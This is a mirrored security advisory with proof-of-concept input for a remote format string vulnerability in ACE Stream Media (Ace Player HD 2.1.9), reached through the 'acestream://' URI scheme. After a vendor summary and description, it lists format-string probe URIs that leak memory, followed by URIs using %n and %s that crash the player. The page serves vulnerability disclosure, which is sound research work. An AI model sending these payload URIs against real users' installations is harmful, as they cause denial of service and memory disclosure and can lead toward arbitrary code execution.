首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2014-01-09  
ACE Stream Media 2.1 (acestream://) Format String Exploit PoC
  
  
Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)
  
Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
technology, BitTorrent protocol, which is acknowledged as the most
effective protocol to transfer/deliver 'heavy content'.
  
Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input thru the URI using the 'acestream://'
protocol before including it in the format-specifier argument of
a formatted-printing function. A remote attacker may exploit this
issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
  
  
30.12.2013
  
--
  
  
format md:
  
acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s
  
crashes:
  
acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CCProxy 7.3 - Integer Overflow
·Ofilter Player 1.1 - (.wav) In
·vTiger CRM SOAP AddEmailAttach
·SerComm Device Remote Code Exe
·Total Video Player Denial Of S
·SerComm Device Remote Code Exe
·IcoFX 2.1 (.ico) - Stack Buffe
·SoapUI 4.6.3 - Remote Code Exe
·IBM Forms Viewer Unicode Buffe
·haneWIN DNS Server 1.5.3 - Den
·MuPDF 1.3 - Stack-based Buffer
·VM86 Syscall Kernel Panic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved